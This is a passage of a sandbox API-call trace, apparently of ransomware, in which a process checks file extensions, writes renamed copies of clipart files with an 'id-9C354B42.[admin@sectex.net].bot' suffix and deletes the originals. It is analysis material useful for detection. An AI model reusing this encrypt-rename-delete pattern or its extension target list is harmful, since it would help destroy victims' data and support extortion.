	[0154.326] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0154.326] lstrlenW (lpString=".docx") returned 5
	[0154.326] lstrcmpiW (lpString1=".docx", lpString2="1.GIF") returned -1
	[0154.326] lstrlenW (lpString=".pdf") returned 4
	[0154.326] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0154.326] lstrlenW (lpString=".xls") returned 4
	[0154.326] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0154.326] lstrlenW (lpString=".xlsx") returned 5
	[0154.326] lstrcmpiW (lpString1=".xlsx", lpString2="1.GIF") returned -1
	[0154.326] lstrlenW (lpString=".ppt") returned 4
	[0154.326] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0154.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099201.GIF") returned 63
	[0154.326] lstrlenW (lpString=".zip") returned 4
	[0154.326] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0154.326] lstrlenW (lpString=".rar") returned 4
	[0154.326] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0154.327] lstrlenW (lpString=".bz2") returned 4
	[0154.327] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0154.327] lstrlenW (lpString=".7z") returned 3
	[0154.327] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0154.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099201.GIF") returned 63
	[0154.327] lstrlenW (lpString=".dbf") returned 4
	[0154.327] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0154.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099201.GIF") returned 63
	[0154.327] lstrlenW (lpString=".1cd") returned 4
	[0154.327] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0154.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099201.GIF") returned 63
	[0154.327] lstrlenW (lpString=".jpg") returned 4
	[0154.327] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0154.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099201.GIF") returned 63
	[0154.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099201.GIF") returned 63
	[0154.327] lstrlenW (lpString=".doc") returned 4
	[0154.327] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0154.327] lstrlenW (lpString=".docx") returned 5
	[0154.327] lstrcmpiW (lpString1=".docx", lpString2="1.GIF") returned -1
	[0154.327] lstrlenW (lpString=".pdf") returned 4
	[0154.327] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0154.327] lstrlenW (lpString=".xls") returned 4
	[0154.327] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0154.327] lstrlenW (lpString=".xlsx") returned 5
	[0154.327] lstrcmpiW (lpString1=".xlsx", lpString2="1.GIF") returned -1
	[0154.327] lstrlenW (lpString=".ppt") returned 4
	[0154.327] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0154.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099201.GIF") returned 63
	[0154.327] lstrlenW (lpString=".zip") returned 4
	[0154.327] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0154.328] lstrlenW (lpString=".rar") returned 4
	[0154.328] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0154.328] lstrlenW (lpString=".bz2") returned 4
	[0154.328] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0154.328] lstrlenW (lpString=".7z") returned 3
	[0154.328] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0154.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099201.GIF") returned 63
	[0154.328] lstrlenW (lpString=".dbf") returned 4
	[0154.328] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0154.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099201.GIF") returned 63
	[0154.328] lstrlenW (lpString=".1cd") returned 4
	[0154.328] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0154.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099201.GIF") returned 63
	[0154.328] lstrlenW (lpString=".jpg") returned 4
	[0154.328] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0154.328] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0154.328] lstrlenW (lpString="J0099202.GIF") returned 12
	[0154.328] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099202.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099202.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0154.329] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=4967) returned 1
	[0154.329] CloseHandle (hObject=0x39c) returned 1
	[0154.329] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099202.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099202.gif")) returned 0x20
	[0154.329] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099202.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099202.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.329] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099202.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099202.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0154.329] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.329] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.329] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099202.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099202.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0154.330] GetLastError () returned 0x0
	[0154.330] ReadFile (in: hFile=0x39c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x1367, lpOverlapped=0x0) returned 1
	[0154.332] WriteFile (in: hFile=0x3e0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x1370, lpOverlapped=0x0) returned 1
	[0154.332] ReadFile (in: hFile=0x39c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0154.333] WriteFile (in: hFile=0x3e0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0154.333] SetEndOfFile (hFile=0x3e0) returned 1
	[0154.336] CloseHandle (hObject=0x3e0) returned 1
	[0154.336] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.336] SetEndOfFile (hFile=0x39c) returned 1
	[0154.490] CloseHandle (hObject=0x39c) returned 1
	[0154.490] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099202.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0154.791] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099202.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099202.gif")) returned 1
	[0154.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099202.GIF") returned 63
	[0154.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099202.GIF") returned 63
	[0154.818] lstrlenW (lpString=".doc") returned 4
	[0154.818] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0154.818] lstrlenW (lpString=".docx") returned 5
	[0154.818] lstrcmpiW (lpString1=".docx", lpString2="2.GIF") returned -1
	[0154.818] lstrlenW (lpString=".pdf") returned 4
	[0154.819] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0154.819] lstrlenW (lpString=".xls") returned 4
	[0154.819] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0154.819] lstrlenW (lpString=".xlsx") returned 5
	[0154.819] lstrcmpiW (lpString1=".xlsx", lpString2="2.GIF") returned -1
	[0154.819] lstrlenW (lpString=".ppt") returned 4
	[0154.819] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0154.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099202.GIF") returned 63
	[0154.819] lstrlenW (lpString=".zip") returned 4
	[0154.819] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0154.819] lstrlenW (lpString=".rar") returned 4
	[0154.819] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0154.819] lstrlenW (lpString=".bz2") returned 4
	[0154.819] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0154.819] lstrlenW (lpString=".7z") returned 3
	[0154.819] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0154.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099202.GIF") returned 63
	[0154.819] lstrlenW (lpString=".dbf") returned 4
	[0154.819] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0154.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099202.GIF") returned 63
	[0154.819] lstrlenW (lpString=".1cd") returned 4
	[0154.819] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0154.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099202.GIF") returned 63
	[0154.819] lstrlenW (lpString=".jpg") returned 4
	[0154.819] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0154.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099202.GIF") returned 63
	[0154.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099202.GIF") returned 63
	[0154.819] lstrlenW (lpString=".doc") returned 4
	[0154.819] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0154.819] lstrlenW (lpString=".docx") returned 5
	[0154.819] lstrcmpiW (lpString1=".docx", lpString2="2.GIF") returned -1
	[0154.820] lstrlenW (lpString=".pdf") returned 4
	[0154.820] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0154.820] lstrlenW (lpString=".xls") returned 4
	[0154.820] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0154.820] lstrlenW (lpString=".xlsx") returned 5
	[0154.820] lstrcmpiW (lpString1=".xlsx", lpString2="2.GIF") returned -1
	[0154.820] lstrlenW (lpString=".ppt") returned 4
	[0154.820] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0154.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099202.GIF") returned 63
	[0154.820] lstrlenW (lpString=".zip") returned 4
	[0154.820] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0154.820] lstrlenW (lpString=".rar") returned 4
	[0154.820] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0154.820] lstrlenW (lpString=".bz2") returned 4
	[0154.820] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0154.820] lstrlenW (lpString=".7z") returned 3
	[0154.820] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0154.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099202.GIF") returned 63
	[0154.820] lstrlenW (lpString=".dbf") returned 4
	[0154.820] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0154.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099202.GIF") returned 63
	[0154.820] lstrlenW (lpString=".1cd") returned 4
	[0154.820] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0154.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099202.GIF") returned 63
	[0154.820] lstrlenW (lpString=".jpg") returned 4
	[0154.820] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0154.820] lstrcmpiW (lpString1=".BMP", lpString2=".bot") returned -1
	[0154.820] lstrlenW (lpString="J0101857.BMP") returned 12
	[0154.821] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101857.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101857.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0154.857] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=32184) returned 1
	[0154.857] CloseHandle (hObject=0x3cc) returned 1
	[0154.857] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101857.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101857.bmp")) returned 0x20
	[0154.857] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101857.BMP.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101857.bmp.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.857] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101857.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101857.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0154.857] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.857] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.857] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101857.BMP.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101857.bmp.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0154.858] GetLastError () returned 0x0
	[0154.858] ReadFile (in: hFile=0x3cc, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x7db8, lpOverlapped=0x0) returned 1
	[0154.860] WriteFile (in: hFile=0x3b4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x7dc0, lpOverlapped=0x0) returned 1
	[0154.862] ReadFile (in: hFile=0x3cc, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0154.862] WriteFile (in: hFile=0x3b4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0154.862] SetEndOfFile (hFile=0x3b4) returned 1
	[0154.862] CloseHandle (hObject=0x3b4) returned 1
	[0154.862] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.862] SetEndOfFile (hFile=0x3cc) returned 1
	[0154.864] CloseHandle (hObject=0x3cc) returned 1
	[0154.864] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101857.BMP.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0154.865] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101857.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101857.bmp")) returned 1
	[0154.865] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101857.BMP") returned 63
	[0154.865] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101857.BMP") returned 63
	[0154.865] lstrlenW (lpString=".doc") returned 4
	[0154.865] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1
	[0154.865] lstrlenW (lpString=".docx") returned 5
	[0154.865] lstrcmpiW (lpString1=".docx", lpString2="7.BMP") returned -1
	[0154.866] lstrlenW (lpString=".pdf") returned 4
	[0154.866] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1
	[0154.866] lstrlenW (lpString=".xls") returned 4
	[0154.866] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1
	[0154.866] lstrlenW (lpString=".xlsx") returned 5
	[0154.866] lstrcmpiW (lpString1=".xlsx", lpString2="7.BMP") returned -1
	[0154.866] lstrlenW (lpString=".ppt") returned 4
	[0154.866] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1
	[0154.866] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101857.BMP") returned 63
	[0154.866] lstrlenW (lpString=".zip") returned 4
	[0154.866] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1
	[0154.866] lstrlenW (lpString=".rar") returned 4
	[0154.866] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1
	[0154.866] lstrlenW (lpString=".bz2") returned 4
	[0154.866] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1
	[0154.866] lstrlenW (lpString=".7z") returned 3
	[0154.866] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1
	[0154.866] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101857.BMP") returned 63
	[0154.866] lstrlenW (lpString=".dbf") returned 4
	[0154.866] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1
	[0154.866] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101857.BMP") returned 63
	[0154.866] lstrlenW (lpString=".1cd") returned 4
	[0154.866] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1
	[0154.866] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101857.BMP") returned 63
	[0154.866] lstrlenW (lpString=".jpg") returned 4
	[0154.866] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1
	[0154.866] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101857.BMP") returned 63
	[0154.866] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101857.BMP") returned 63
	[0154.866] lstrlenW (lpString=".doc") returned 4
	[0154.866] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1
	[0154.866] lstrlenW (lpString=".docx") returned 5
	[0154.867] lstrcmpiW (lpString1=".docx", lpString2="7.BMP") returned -1
	[0154.867] lstrlenW (lpString=".pdf") returned 4
	[0154.867] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1
	[0154.867] lstrlenW (lpString=".xls") returned 4
	[0154.867] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1
	[0154.867] lstrlenW (lpString=".xlsx") returned 5
	[0154.867] lstrcmpiW (lpString1=".xlsx", lpString2="7.BMP") returned -1
	[0154.867] lstrlenW (lpString=".ppt") returned 4
	[0154.867] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1
	[0154.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101857.BMP") returned 63
	[0154.867] lstrlenW (lpString=".zip") returned 4
	[0154.867] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1
	[0154.867] lstrlenW (lpString=".rar") returned 4
	[0154.867] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1
	[0154.867] lstrlenW (lpString=".bz2") returned 4
	[0154.867] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1
	[0154.867] lstrlenW (lpString=".7z") returned 3
	[0154.867] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1
	[0154.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101857.BMP") returned 63
	[0154.867] lstrlenW (lpString=".dbf") returned 4
	[0154.867] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1
	[0154.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101857.BMP") returned 63
	[0154.867] lstrlenW (lpString=".1cd") returned 4
	[0154.867] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1
	[0154.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101857.BMP") returned 63
	[0154.867] lstrlenW (lpString=".jpg") returned 4
	[0154.867] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1
	[0154.867] lstrcmpiW (lpString1=".BMP", lpString2=".bot") returned -1
	[0154.868] lstrlenW (lpString="J0101858.BMP") returned 12
	[0154.868] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101858.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0154.868] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=32184) returned 1
	[0154.868] CloseHandle (hObject=0x3cc) returned 1
	[0154.868] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101858.bmp")) returned 0x20
	[0154.868] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101858.bmp.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.869] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101858.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0154.869] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.869] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.869] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101858.bmp.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0154.869] GetLastError () returned 0x0
	[0154.869] ReadFile (in: hFile=0x3cc, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x7db8, lpOverlapped=0x0) returned 1
	[0154.871] WriteFile (in: hFile=0x3b4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x7dc0, lpOverlapped=0x0) returned 1
	[0154.873] ReadFile (in: hFile=0x3cc, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0154.873] WriteFile (in: hFile=0x3b4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0154.873] SetEndOfFile (hFile=0x3b4) returned 1
	[0154.873] CloseHandle (hObject=0x3b4) returned 1
	[0154.873] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.873] SetEndOfFile (hFile=0x3cc) returned 1
	[0154.875] CloseHandle (hObject=0x3cc) returned 1
	[0154.876] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0154.876] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101858.bmp")) returned 1
	[0154.876] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP") returned 63
	[0154.876] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP") returned 63
	[0154.876] lstrlenW (lpString=".doc") returned 4
	[0154.876] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1
	[0154.876] lstrlenW (lpString=".docx") returned 5
	[0154.876] lstrcmpiW (lpString1=".docx", lpString2="8.BMP") returned -1
	[0154.877] lstrlenW (lpString=".pdf") returned 4
	[0154.877] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1
	[0154.877] lstrlenW (lpString=".xls") returned 4
	[0154.877] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1
